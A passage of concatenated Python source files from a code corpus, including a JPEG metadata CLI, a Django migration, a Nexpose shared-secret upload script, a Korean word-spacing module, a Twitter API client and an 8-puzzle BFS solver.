Program for adding metadata to half of stereoscopic image in JPEG. \n It can also decode data from previously created image. All custom\n metadata are stored in APP3, it erases old data stored there. \n Program does not erase any other data\"\"\", \n epilog=\"\"\"\n Exit codes:\n 1 = Metadata file not accessible\n 2 = image file not accessible\n 3 = Input file not selected\n 4 = No permission for write to output file\n 5 = File already exists, use override parameter or change name\n 6 = File to decode is not JPEG\n 7 = Image file is not JPEG\n 8 = Problem when cropping image.\n 9 = Metadata stored in image are corrupted\n \"\"\")\n\n parser.add_argument(\"-e\", \"--extract\", help=\"Data are \\\n going to be extracted from image. Otherwise added to image.\",\n action='store_true', default=False)\n\n parser.add_argument(\"-o\", \"--overwrite\", help=\"Overwrite existing file.\",\n action='store_true', default=False)\n\n parser.add_argument(\"metadata_file\", help=\"Name of file with metadata of file \\\n to be decoded or packed to image file\")\n\n parser.add_argument(\"output_file\", help=\"Name of output file.\")\n\n parser.add_argument(\"image_file\", help=\"Name of file with orig. stereoscopic \\\n image\", nargs='?', default=None)\n\n arguments = parser.parse_args()\n\n # Checking file existence and permissions\n # ------------------------------------------------------------------------------\n # existence and permissions of input files\n if not check_file(arguments.metadata_file, os.R_OK):\n print('File', arguments.metadata_file, 'is not accesible.', file=sys.stderr)\n exit(1)\n \n if (arguments.image_file is not None and not\n check_file(arguments.image_file, os.R_OK)):\n print('File', arguments.image_file, 'is not accesible.', file=sys.stderr)\n exit(2)\n \n # need to specify all input files when creating new image\n if not arguments.extract and arguments.image_file is None:\n print('Input file needs to be specified when encoding data to it.',\n file=sys.stderr)\n exit(3)\n\n # checking existence of output file, overwriting or exiting based on '-o'\n if os.path.exists(arguments.output_file):\n print('File \\'{}\\' already exists.'.format(arguments.output_file), \n file=sys.stderr)\n if not os.access(arguments.output_file, os.W_OK):\n print('Do not have write permissions', file=sys.stderr)\n exit(4)\n if not arguments.overwrite:\n print('Use -o to overwrite output files or select different name.')\n exit(5)\n print('Overwriting based on -o.', file=sys.stderr)\n \n # operating with images\n if arguments.extract:\n extract_data(arguments.metadata_file, arguments.output_file)\n else:\n pack_data(arguments.image_file, arguments.metadata_file,\n arguments.output_file)\n\nif __name__ == '__main__':\n main()\n","sub_path":"python_semestral_work.py","file_name":"python_semestral_work.py","file_ext":"py","file_size_in_byte":10877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"305139584","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Directory',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('dir_name', models.CharField(max_length=50)),\n ('parent_dir', models.IntegerField()),\n ],\n ),\n migrations.CreateModel(\n name='Log',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('term_id', models.CharField(max_length=50)),\n ('param_id', models.CharField(max_length=50)),\n ('value_id', models.CharField(max_length=50)),\n ('added', models.DateTimeField(auto_now_add=True)),\n ('user_id', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ['added'],\n },\n ),\n migrations.CreateModel(\n name='Parameters',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('param_name', models.CharField(max_length=50)),\n ],\n ),\n migrations.CreateModel(\n name='Terminals',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('term_name', models.CharField(max_length=50)),\n ('dir_id', models.ForeignKey(to='commander.Directory')),\n ],\n ),\n migrations.CreateModel(\n name='TermParam',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('param_id', models.ForeignKey(to='commander.Parameters')),\n ('term_id', models.ForeignKey(to='commander.Terminals')),\n ],\n ),\n migrations.CreateModel(\n name='Values',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('value', models.CharField(max_length=50)),\n ('term_param_id', models.ForeignKey(to='commander.TermParam')),\n ],\n ),\n ]\n","sub_path":"commander/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"544774328","text":"import requests\nimport os\nimport json\nimport logging\nimport tempfile\nimport argparse\nimport paramiko\nimport tempfile\nimport shutil\nfrom requests.auth import HTTPBasicAuth\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nlogging.basicConfig(level=logging.INFO)\n\nBASE_URL = os.environ.get(\n 'BASE_URL', \n '')\n\nSECRET_TTL_PATH = os.environ.get(\n 'SECRET_TTL_PATH', \n 'scan_engines/shared_secret/time_to_live')\n\nSECRET_CREATION_PATH = os.environ.get(\n 'SECRET_CREATION_PATH',\n 'scan_engines/shared_secret')\n\nNEXPOSE_HOST = os.environ.get(\n 'NEXPOSE_HOST',\n '')\n\nNEXPOSE_PORT = os.environ.get(\n 'NEXPOSE_PORT',\n '40815')\n\nAZURE_LOCATION = os.environ.get(\n 'AZURE_LOCATION',\n '/opt/rapid7/nexpose/nse/conf')\n\nSECRET_TTL_URL = BASE_URL + SECRET_TTL_PATH\n\nSECRET_CREATION_URL = BASE_URL + SECRET_CREATION_PATH\n\nnxusername = ''\n\nnxpassword = ''\n\nscan_engine_private_key = ''\n\noutput_type = ''\n\nupload = False\n\nscan_engine_user = ''\n\nscan_engine_server = ''\n\ndef main():\n init_cli_args()\n\n shared_secret = create_shared_secret()\n\n ttl = get_ttl_of_secret() # ttl is in minutes\n\n if ttl < 15:\n revoke_shared_secret()\n shared_secret = create_shared_secret()\n\n if upload:\n upload_data(shared_secret)\n\n if output_type == 'json':\n data = {\n \"status\": 200,\n \"message\": {\"sharedSecret\": shared_secret}\n }\n return json.dumps(data, indent=4)\n elif output_type == 'xml':\n data = format_in_xml(shared_secret)\n return data\n elif output_type == 'string':\n return shared_secret\n else:\n return {'status': 500, 'message': 'system error'}\n\n\ndef init_cli_args():\n global nxusername\n global nxpassword\n global output_type\n global scan_engine_private_key\n global upload\n global scan_engine_user\n global scan_engine_server\n\n parser = argparse.ArgumentParser()\n\n required = parser.add_argument_group('required arguments')\n optional = parser.add_argument_group('optional arguments')\n\n optional.add_argument(\n \"-k\", \n \"--private_key\", \n help=\"ssh private key path for auth to nexpose scan engine\")\n\n required.add_argument(\n \"-u\", \n \"--nxusername\", \n help=\"username for your nxadmin account\", \n required=True)\n\n required.add_argument(\n \"-p\", \n \"--nxpassword\", \n help=\"password for your nxadmin account\", \n required=True)\n\n optional.add_argument(\n \"-o\", \n \"--output\", \n help=\"output types [xml, json, string]\",\n choices=['xml', 'json', 'string'],\n default='json')\n\n optional.add_argument(\n \"-l\", \n \"--upload\", \n help=\"upload xml to azure scan engine\",\n action='store_true')\n\n optional.add_argument(\n \"-e\", \n \"--engine_user\", \n help=\"username for nexpose scan engine server\")\n\n optional.add_argument(\n \"-s\", \n \"--engine_server\", \n help=\"nexpose scan engine server hostname or ip\")\n\n cli_args = parser.parse_args()\n\n nxusername = cli_args.nxusername\n nxpassword = cli_args.nxpassword\n scan_engine_private_key = cli_args.private_key\n output_type = cli_args.output\n upload = cli_args.upload\n scan_engine_user = cli_args.engine_user\n scan_engine_server = cli_args.engine_server\n\n\ndef create_shared_secret():\n response = requests.post(\n url=SECRET_CREATION_URL, \n auth=HTTPBasicAuth(nxusername, nxpassword))\n\n if response.status_code == 415:\n raise SystemExit(json.dumps(\n {'status': response.status_code, \"message\": \"unknown error\"}, indent=4))\n elif response.status_code != 201:\n raise SystemExit(json.dumps(response.json(), indent=4))\n\n shared_secret = response.content.decode(\"utf-8\") \n\n return shared_secret\n\n\ndef get_ttl_of_secret():\n response = requests.get(\n url=SECRET_TTL_URL, \n auth=HTTPBasicAuth(nxusername, nxpassword))\n\n if response.status_code == 415:\n raise SystemExit(json.dumps(\n {'status': response.status_code, \"message\": \"unknown error\"}, indent=4))\n elif response.status_code != 200:\n raise SystemExit(json.dumps(response.json(), indent=4))\n\n ttl = int(response.content)\n\n return ttl // 60\n\n\ndef revoke_shared_secret():\n response = requests.delete(\n url=SECRET_CREATION_URL, \n auth=HTTPBasicAuth(nxusername, nxpassword))\n\n if response.status_code == 415:\n raise SystemExit(json.dumps(\n {'status': response.status_code, \"message\": \"unknown error\"}, indent=4))\n elif response.status_code != 200:\n raise SystemExit(json.dumps(response.json(), indent=4))\n\n return True\n\ndef format_in_xml(shared_secret):\n xml = \"\"\"\n \n \n \n \n \"\"\".format(NEXPOSE_HOST, NEXPOSE_PORT, shared_secret)\n\n return xml\n\n\ndef upload_data(shared_secret):\n xml = format_in_xml(shared_secret)\n\n try:\n fd,tmpfile = tempfile.mkstemp()\n file_ = os.fdopen(fd, \"w+b\")\n file_.write(xml.encode('utf-8'))\n file_.seek(0)\n\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n k = paramiko.RSAKey.from_private_key_file(scan_engine_private_key)\n ssh.connect(scan_engine_server, username=scan_engine_user, pkey = k)\n sftp = ssh.open_sftp()\n sftp.chdir(AZURE_LOCATION)\n sftp.putfo(file_, 'consoles.xml')\n except Exception as e:\n if os.path.exists(tmpfile):\n os.unlink(tmpfile)\n \n data = {\n \"status\": 500,\n \"message\": \"unable to upload data to {}. {}\".format(\n scan_engine_server, str(e))\n }\n \n raise SystemExit(json.dumps(data, indent=4))\n finally:\n if os.path.exists(tmpfile):\n os.unlink(tmpfile)\n\n data = {\n \"status\": 200,\n \"message\": \"Data uploaded to {}\".format(scan_engine_server)\n }\n raise SystemExit(json.dumps(data, indent=4))\n\n\nif __name__ == '__main__':\n print(main())\n","sub_path":"nx_tool/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"122242932","text":"\r\n# -*- coding: utf-8 -*-\r\n\r\nimport re\r\nimport pickle\r\n\r\nINF = 9999\r\nMAX_SENTENCE_LENGTH = 300\r\n\r\n\r\nclass SpacingModule:\r\n\r\n def __init__(self, _path):\r\n self._string = \"\"\r\n self._path = _path\r\n self._max_length = MAX_SENTENCE_LENGTH\r\n self._table = []\r\n self._score = []\r\n self._bt = []\r\n self._segment = []\r\n self._buf_list = []\r\n self._schar_list = []\r\n self._kstring = []\r\n self._eojeol_dictionary = {}\r\n self._morpheme_dictionary = {}\r\n self._postpositional_particle_dictionary = {}\r\n self.__create_table()\r\n self.__open_dictionary()\r\n\r\n def spacing(self, _string):\r\n self.__init_table(_string)\r\n self.__special_char_processing()\r\n self.__prepare()\r\n self.__forward()\r\n self.__backward()\r\n self.__apply_heuristics()\r\n self.__merge_string()\r\n self.__quotation_mark_processing()\r\n self.__syllable_processing()\r\n self.__etc_heuristics()\r\n return self._string\r\n\r\n def __create_table(self):\r\n self._table = [[0] * self._max_length for col in range(self._max_length)]\r\n self._score = [0] * self._max_length\r\n self._bt = [0] * self._max_length\r\n\r\n def __open_dictionary(self):\r\n eojeol_dict_file = open(self._path + \"/dict/eojeol/eojeol_dict.dict\", 'rb')\r\n morpheme_dict_file = open(self._path + \"/dict/morpheme/morpheme_dict.dict\", 'rb')\r\n postpositional_particle_dict_file = open(self._path +\r\n \"/dict/postpositional particle/postpositional_particle_dict.dict\", 'rb')\r\n\r\n self._eojeol_dictionary = pickle.load(eojeol_dict_file, encoding='UTF-8')\r\n self._morpheme_dictionary = pickle.load(morpheme_dict_file, encoding='UTF-8')\r\n self._postpositional_particle_dictionary = pickle.load(postpositional_particle_dict_file, encoding='UTF-8')\r\n\r\n def __init_table(self, _string):\r\n self._string = _string.strip()\r\n for j in range(self._max_length):\r\n self._score[j] = 0\r\n self._bt[j] = 0\r\n for k in range(self._max_length):\r\n self._table[j][k] = 0\r\n self._segment.clear()\r\n self._schar_list.clear()\r\n\r\n def __special_char_processing(self):\r\n split_char = '!@#'\r\n schar = re.compile('[^\\u3131-\\u3163\\uac00-\\ud7a3]+')\r\n\r\n buffer = schar.sub(split_char, self._string)\r\n self._kstring = buffer.split(split_char)\r\n self._schar_list = schar.findall(self._string)\r\n\r\n self._string = schar.sub('', self._string)\r\n self._string = ' ' + self._string\r\n self._length = len(self._string)\r\n\r\n def __eojeol_score(self, _string):\r\n if _string in self._eojeol_dictionary:\r\n return self._eojeol_dictionary.get(_string)\r\n\r\n def __prepare(self):\r\n # table is empty == 0\r\n # table is exists != 0\r\n # table is virtual eojeols == -10.0\r\n for j in range(1, self._length):\r\n for k in range(j, self._length):\r\n if k - j >= 10:\r\n break\r\n slicing_string = self._string[j:k + 1]\r\n if slicing_string in self._eojeol_dictionary:\r\n self._table[j][k] = self.__eojeol_score(slicing_string)\r\n else:\r\n self._table[j][k] = 0\r\n\r\n # adding virtual eojeols\r\n for j in range(1, self._length):\r\n for k in range(j, self._length):\r\n if self._table[j][k] is not 0 and self._table[j][k] is not -10.0:\r\n i = j - 1\r\n cnt = 0\r\n while i > 0 and cnt < 6:\r\n if self._table[i][j - 1] is 0:\r\n self._table[i][j - 1] = -10.0\r\n i = i - 1\r\n cnt = cnt + 1\r\n\r\n def __forward(self):\r\n self._score[0] = 0\r\n for i in range(1, self._length):\r\n self._score[i] = -INF\r\n for j in range(1, self._length):\r\n for k in range(j, self._length):\r\n if self._table[j][k] is not 0:\r\n if (self._score[j - 1] + self._table[j][k]) > self._score[k]:\r\n self._score[k] = self._score[j - 1] + self._table[j][k]\r\n self._bt[k] = j\r\n self._bt[self._length - 1] = self._bt[self._length - 2]\r\n\r\n def __backward(self):\r\n k = self._length - 1\r\n while k > 0:\r\n j = self._bt[k]\r\n slicing_string = self._string[j:k + 1]\r\n self._segment.append(slicing_string)\r\n k = j - 1\r\n self._segment.reverse()\r\n\r\n def __add(self, _idx):\r\n _string = str(self._segment[_idx - 1]) + str(self._segment[_idx])\r\n self._segment.pop(_idx - 1)\r\n self._segment.pop(_idx - 1)\r\n self._segment.insert(_idx - 1, str(_string))\r\n\r\n def __apply_heuristics(self):\r\n sticklst = list()\r\n del sticklst[:]\r\n\r\n for idx in range(1, self._segment.__len__()):\r\n if self.__heuristics_1(idx) is True:\r\n if self.__heuristics_1_1(idx) is True or \\\r\n self.__heuristics_1_2(idx) is True or \\\r\n self.__heuristics_1_3(idx) is True:\r\n sticklst.append(idx)\r\n\r\n dist = 0\r\n for i in range(sticklst.__len__()):\r\n self.__add(sticklst[i] - dist)\r\n dist = dist + 1\r\n\r\n def __heuristics_1(self, _idx):\r\n morpheme = self._segment[_idx - 1]\r\n if morpheme in self._morpheme_dictionary:\r\n for i in range(self._morpheme_dictionary[morpheme].__len__()):\r\n if self._morpheme_dictionary[morpheme][i] == \"NNG\" or \\\r\n self._morpheme_dictionary[morpheme][i] == \"NNP\" or \\\r\n self._morpheme_dictionary[morpheme][i] == \"NNB\":\r\n return True\r\n return False\r\n\r\n def __heuristics_1_1(self, _idx):\r\n morpheme = self._segment[_idx]\r\n if morpheme in self._postpositional_particle_dictionary:\r\n return True\r\n if morpheme in self._morpheme_dictionary:\r\n for i in range(self._morpheme_dictionary[morpheme].__len__()):\r\n if self._morpheme_dictionary[morpheme][i] == \"VX\":\r\n return True\r\n return False\r\n\r\n def __heuristics_1_2(self, _idx):\r\n this_eojeol = self._segment[_idx]\r\n length = this_eojeol.__len__()\r\n for k in range(length):\r\n morpheme = this_eojeol[0:k + 1]\r\n if morpheme in self._morpheme_dictionary and \\\r\n (morpheme is \"하\" or morpheme is \"되\" or morpheme is \"시키\"):\r\n for i in range(self._morpheme_dictionary[morpheme].__len__()):\r\n if self._morpheme_dictionary[morpheme][i] == \"VV\":\r\n return True\r\n return False\r\n\r\n def __heuristics_1_3(self, _idx):\r\n this_eojeol = self._segment[_idx]\r\n if this_eojeol[0] is \"들\":\r\n return True\r\n return False\r\n\r\n def __heuristics_2(self, _idx):\r\n morpheme = self._segment[_idx]\r\n if morpheme in self._morpheme_dictionary:\r\n for i in range(self._morpheme_dictionary[morpheme].__len__()):\r\n if self._morpheme_dictionary[morpheme][i] == \"JKS\" or \\\r\n self._morpheme_dictionary[morpheme][i] == \"JKC\" or \\\r\n self._morpheme_dictionary[morpheme][i] == \"JKG\" or \\\r\n self._morpheme_dictionary[morpheme][i] == \"JKO\" or \\\r\n self._morpheme_dictionary[morpheme][i] == \"JKB\" or \\\r\n self._morpheme_dictionary[morpheme][i] == \"JKV\" or \\\r\n self._morpheme_dictionary[morpheme][i] == \"JKQ\" or \\\r\n self._morpheme_dictionary[morpheme][i] == \"JX\" or \\\r\n self._morpheme_dictionary[morpheme][i] == \"JC\":\r\n return True\r\n return False\r\n\r\n def __merge_string(self):\r\n result = ''\r\n seg_length = self._segment.__len__()\r\n for i in range(seg_length):\r\n result += self._segment[i]\r\n result += ' '\r\n result = result[:-1]\r\n idx = 0\r\n for i in range(len(self._kstring) - 1):\r\n for j in range(len(self._kstring[i])):\r\n if result[idx] == ' ':\r\n idx += 1\r\n if self._kstring[i][j] == result[idx]:\r\n idx += 1\r\n result = result[:idx] + self._schar_list[i] + result[idx:]\r\n idx += len(self._schar_list[i])\r\n\r\n string = result\r\n length = len(result)\r\n result = result[0]\r\n kor = re.compile('[가-힝]')\r\n num = re.compile('[0-9]')\r\n eng = re.compile('[a-zA-Z]')\r\n\r\n for i in range(1, length - 1):\r\n fk = kor.match(string[i - 1])\r\n tk = kor.match(string[i + 1])\r\n n = num.match(string[i])\r\n fn = num.match(string[i - 1])\r\n fe = eng.match(string[i - 1])\r\n if fk and n:\r\n result += ' '\r\n if fe and tk and string[i] == ' ':\r\n continue\r\n if fn and tk and string[i] == ' ':\r\n continue\r\n result += string[i]\r\n result += string[length - 1]\r\n self._string = result\r\n\r\n def __quotation_mark_processing(self):\r\n # 큰따옴표, 작은따옴표, 쉼표\r\n result = self._string\r\n length = result.__len__()\r\n ret = \"\"\r\n flag1 = 0\r\n flag2 = 0\r\n for i in range(length):\r\n if result[i] is '\"':\r\n flag1 = flag1 + 1\r\n if flag1 % 2 is 1:\r\n if i - 1 >= 0 and result[i - 1] is not ' ':\r\n ret = ret + ' \"'\r\n continue\r\n ret = ret + '\"'\r\n continue\r\n elif flag1 % 2 is 0:\r\n if i - 1 >= 0 and result[i - 1] is ' ':\r\n ret = ret[0:ret.__len__() - 1]\r\n ret = ret + '\"'\r\n continue\r\n elif result[i] is \"'\":\r\n flag2 = flag2 + 1\r\n if flag2 % 2 is 1:\r\n if i - 1 >= 0 and result[i - 1] is not ' ':\r\n ret = ret + \" '\"\r\n continue\r\n ret = ret + \"'\"\r\n continue\r\n elif flag2 % 2 is 0:\r\n if i - 1 >= 0 and result[i - 1] is ' ':\r\n ret = ret[0:ret.__len__() - 1]\r\n ret = ret + \"'\"\r\n continue\r\n if i - 1 >= 0 and result[i - 1] is '\"' and result[i] is ' ':\r\n continue\r\n if i - 1 >= 0 and result[i - 1] is \"'\" and result[i] is ' ':\r\n continue\r\n ret = ret + result[i]\r\n self._string = ret\r\n\r\n def __syllable_processing(self):\r\n self._segment = self._string.split(' ')\r\n self.__backward_processing()\r\n self.__forward_processing()\r\n buffer = \"\"\r\n for i in range(self._segment.__len__()):\r\n buffer += self._segment[i]\r\n buffer += ' '\r\n self._string = buffer[:-1]\r\n\r\n def __forward_processing(self):\r\n length = self._segment.__len__() - 1\r\n self._buf_list = []\r\n flag = 0\r\n for i in range(length, 0, -1):\r\n if flag == 1:\r\n flag = 0\r\n continue\r\n if len(self._segment[i]) == 1:\r\n buffer = self._segment[i - 1] + self._segment[i]\r\n if buffer in self._eojeol_dictionary:\r\n self._buf_list.append(buffer)\r\n flag += 1\r\n continue\r\n self._buf_list.append(str(self._segment[i]))\r\n if flag == 0:\r\n self._buf_list.append(self._segment[0])\r\n self._segment = list(reversed(self._buf_list))\r\n\r\n def __backward_processing(self):\r\n length = self._segment.__len__()\r\n self._buf_list = []\r\n flag = 0\r\n for i in range(length):\r\n if flag == 1:\r\n flag = 0\r\n continue\r\n if len(self._segment[i]) == 1:\r\n if i == length - 1:\r\n self._buf_list.append(self._segment[i])\r\n break\r\n buffer = self._segment[i] + self._segment[i+1]\r\n if buffer in self._eojeol_dictionary:\r\n self._buf_list.append(buffer)\r\n flag += 1\r\n continue\r\n self._buf_list.append(self._segment[i])\r\n self._segment = self._buf_list\r\n\r\n def __etc_heuristics(self):\r\n result = self._string\r\n result = re.sub(',', ', ', result)\r\n result = re.sub('% ', '%', result)\r\n result = re.sub(' 를', '를', result)\r\n result = re.sub(' 을', '을', result)\r\n result = re.sub(' 만 ', '만 ', result)\r\n result = re.sub(' 만,', '만,', result)\r\n result = re.sub('지않', '지 않', result)\r\n result = re.sub('것같', '것 같', result)\r\n result = re.sub(' {1}\\(', '(', result)\r\n result = re.sub('\\( {1}', '(', result)\r\n result = re.sub(' {1}\\)', ')', result)\r\n result = re.sub('\\) {1}', ')', result)\r\n result = re.sub('· {1}', '·', result)\r\n result = re.sub(' {2}', ' ', result)\r\n result = re.sub('열 었다', '열었다', result)\r\n result = re.sub('말 한다', '말한다', result)\r\n result = re.sub('들 었다', '들었다', result)\r\n result = re.sub('했 었다', '했었다', result)\r\n result = re.sub('그 쳤다', '그쳤다', result)\r\n result = re.sub('습 니다', '습니다', result)\r\n result = re.sub('중요 하다', '중요하다', result)\r\n result = re.sub('열 심이다', '열심이다', result)\r\n result = re.sub('운영 한다', '운영한다', result)\r\n result = re.sub('알 맞다', '알맞다', result)\r\n result = re.sub('고말한다', '고 말한다', result)\r\n result = re.sub('낮 았다', '낮았다', result)\r\n result = re.sub('안내 한다', '안내한다', result)\r\n result = re.sub('만 나서', ' 만나서 ', result)\r\n result = re.sub('시작 하도록', '시작하도록', result)\r\n result = re.sub('많 았다', '많았다', result)\r\n result = re.sub('가능 하다', '가능하다', result)\r\n result = re.sub('있 겠 습니다', ' 있겠습니다', result)\r\n result = re.sub('나섰다', ' 나섰다', result)\r\n result = re.sub('전해졌다', ' 전해졌다', result)\r\n result = re.sub('밝혔다', ' 밝혔다', result)\r\n result = re.sub('감소 했다', '감소했다', result)\r\n result = re.sub('받 았다', '받았다', result)\r\n self._string = result\r\n","sub_path":"BUFS_KoSpacing.py","file_name":"BUFS_KoSpacing.py","file_ext":"py","file_size_in_byte":15099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"435099907","text":"def solution():\n result = 0\n X, Y = map(int, input().split())\n T = int(input())\n locations = [tuple(map(int, input().split())) for i in range(T+1)]\n for i in range(T):\n dong = locations[T][1]\n store = locations[i][1]\n if locations[T][0] == locations[i][0]:\n result += abs(dong - store)\n elif (locations[T][0] == 1 or locations[T][0] == 2):\n if (locations[i][0] == 1 or locations[i][0] == 2):\n result += abs(dong - store) + min(X - dong, dong, X - store, store) * 2 + Y\n elif locations[i][0] == 3:\n if locations[T][0] == 1:\n result += dong + store\n else:\n result += dong + Y - store\n elif locations[i][0] == 4:\n if locations[T][0] == 1:\n result += X - dong + store\n else:\n result += X - dong + Y - store\n elif (locations[T][0] == 3 or locations[T][0] == 4):\n if (locations[i][0] == 3 or locations[i][0] == 4):\n result += abs(dong - store) + min(Y - dong, dong, Y - store, store) * 2 + X\n elif locations[i][0] == 1:\n if locations[T][0] == 3:\n result += dong + store\n else:\n result += dong + X - store\n elif locations[i][0] == 4:\n if locations[T][0] == 1:\n result += Y - dong + store\n else:\n result += Y - dong + X - store\n print(result)\nsolution()","sub_path":"200920/bj_2564.py","file_name":"bj_2564.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"236381108","text":"import logging\nimport random\nimport requests\nfrom typing import List, Union\n\n\ndef _get_headers(bearer_token: str):\n return {'Authorization': 'Bearer {}'.format(bearer_token)}\n\n\nclass TwitterWatcher:\n\n def __init__(self, bearer_token_list: List[str]):\n assert bearer_token_list\n self.bearer_token_list = bearer_token_list\n self.current_token_index = random.randrange(len(bearer_token_list))\n self.logger = logging.getLogger('twitter')\n\n def query(self, url: str, params: dict) -> Union[dict, list, None]:\n for _ in range(len(self.bearer_token_list)):\n self.current_token_index = (self.current_token_index + 1) % len(self.bearer_token_list)\n headers = _get_headers(self.bearer_token_list[self.current_token_index])\n try:\n response = requests.request('GET', url, headers=headers, params=params, timeout=300)\n except requests.exceptions.ConnectionError as e:\n self.logger.error('Request error: {}, try next token.'.format(e))\n continue\n if response.status_code == 200:\n return response.json()\n if response.status_code != 429:\n self.logger.error('Request returned an error: {} {}, try next token.'.format(\n response.status_code, response.text))\n self.logger.error('All tokens are unavailable, query fails. {}'.format(url))\n return None\n\n def get_user_by_username(self, username: str, params: dict) -> dict:\n url = 'https://api.twitter.com/2/users/by/username/{}'.format(username)\n user = None\n while user is None:\n user = self.query(url, params)\n return user\n\n def get_user_by_id(self, id: str, params: dict) -> dict:\n url = 'https://api.twitter.com/2/users/{}'.format(id)\n user = None\n while user is None:\n user = self.query(url, params)\n return user\n\n def get_id_by_username(self, username: str):\n user = self.get_user_by_username(username, {})\n if user.get('errors', None):\n logging.error(\n 'Initialization error, please check if username {} exists'.format(username))\n raise ValueError('\\n'.join([error['detail'] for error in user['errors']]))\n return user['data']['id']\n\n def check_token(self):\n result = dict()\n for bearer_token in self.bearer_token_list:\n headers = _get_headers(bearer_token)\n url = 'https://api.twitter.com/2/users/by/username/Twitter'\n try:\n response = requests.request('GET', url, headers=headers)\n except requests.exceptions.ConnectionError as e:\n result[bearer_token] = False\n print(e)\n continue\n result[bearer_token] = (response.status_code == 200)\n print(response.json())\n return result\n","sub_path":"twitter_watcher.py","file_name":"twitter_watcher.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"463413998","text":"import cv2, time\nFPS = 0\ncap = cv2.VideoCapture(0)\n\nlast = time.time()\n\nfor i in range(0,100):\n before = time.time()\n rval, frame = cap.read()\n now = time.time()\n print(\"cap.read() took: \" + str(now - before))\n if(now - last >= 1):\n print(FPS)\n last = now\n FPS = 0\n else:\n FPS += 1\ncap.release()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"110712654","text":"#!/usr/bin/env python3\nimport random\nimport math\n\n\ndef swap (list, position_a, position_b):\n list[position_a], list[position_b] = list[position_b], list[position_a]\nclass Graph:\n def __init__(self, root, size):\n self.root = root\n self.visited = [root]\n self.queue = []\n self.leaves = [root]\n self.size =size\n\n def bfs(self, goal):\n self.queue.append(self.root)\n while self.queue:\n s = self.queue.pop(0)\n if s.data == goal:\n return s\n if s not in self.visited:\n self.visited.append(s)\n for move in s.moves:\n self.queue.append(move)\n self.queue = []\n return None\n\n def new_level(self):\n count = len(self.leaves)\n for i in range(0, count):\n node = self.leaves.pop(0)\n node.new_moves(self.size)\n for n in node.moves:\n if n not in self.visited:\n self.leaves.append(n)\n\n def print_path(self, node):\n path = [node]\n moves = []\n while node.parent is not None:\n path.append(node.parent)\n node = node.parent\n path.reverse()\n for node in path:\n print(\"{}\\n{}\\n{}\\n\".format(node.data[0:3],node.data[3:6],node.data[6:]))\n\nclass Node:\n def __init__(self, data, position, previous, parent):\n self.moves = []\n self.data = data\n self.position = position\n self.previous = previous\n self.parent = parent\n\n def new_moves(self, size):\n if self.position % size != 0 and self.previous != 'r':\n left_move = self.data.copy()\n swap(left_move, self.position, self.position - 1)\n self.moves.append(Node(left_move, self.position - 1, 'l', self))\n if self.position % size != size-1 and self.previous != 'l':\n right_move = self.data.copy()\n swap(right_move, self.position, self.position + 1)\n self.moves.append(Node(right_move, self.position + 1, 'r', self))\n if self.position > size-1 and self.previous != 'd':\n up_move = self.data.copy()\n swap(up_move, self.position, self.position - size)\n self.moves.append(Node(up_move, self.position - size, 'u', self))\n if self.position < (len(self.data)-size) and self.previous != 'u':\n down_move = self.data.copy()\n swap(down_move, self.position, self.position + size)\n self.moves.append(Node(down_move, self.position + size, 'd', self))\n\n def __str__(self):\n return self.data\n\n\ndef solve(size, input, goal):\n puzzle = input\n print(\"Puzzle:\\n{}\\n{}\\n{}\\n\".format(puzzle[0:3],puzzle[3:6],puzzle[6:]))\n print(\"Goal:\\n{}\\n{}\\n{}\\n\". format(goal[0:3],goal[3:6],goal[6:]))\n\n if puzzle != goal:\n root = Node(puzzle, puzzle.index(0), \"\", None)\n graph = Graph(root, int(size))\n node = None\n max = math.factorial(size**2)/2\n while node is None:\n graph.new_level()\n node = graph.bfs(goal)\n if len(graph.visited) > max:\n print(\"Puzzle has no solution\")\n return 0\n graph.print_path(node)\n print(\"# of nodes: {}\".format(len(graph.visited)))\n return len(graph.visited)\n return 0\n\n\ndef samples(goal, size):\n inputs = []\n for i in range(0, 100):\n new_puzzle = goal.copy()\n for j in range(0, random.randrange(1, 30)):\n move(new_puzzle, random.randrange(4), size, new_puzzle.index(0))\n inputs.append(new_puzzle)\n return inputs\n\n\ndef move(list, move_number, size, position):\n if position % size != 0 and move_number == 0:\n swap(list, position, position - 1)\n if position % size != size - 1 and move_number == 1:\n swap(list, position, position + 1)\n if position > size - 1 and move_number == 2:\n swap(list, position, position - size)\n if position < (len(list) - size) and move_number == 3 :\n swap(list, position, position + size)\n\n\nif 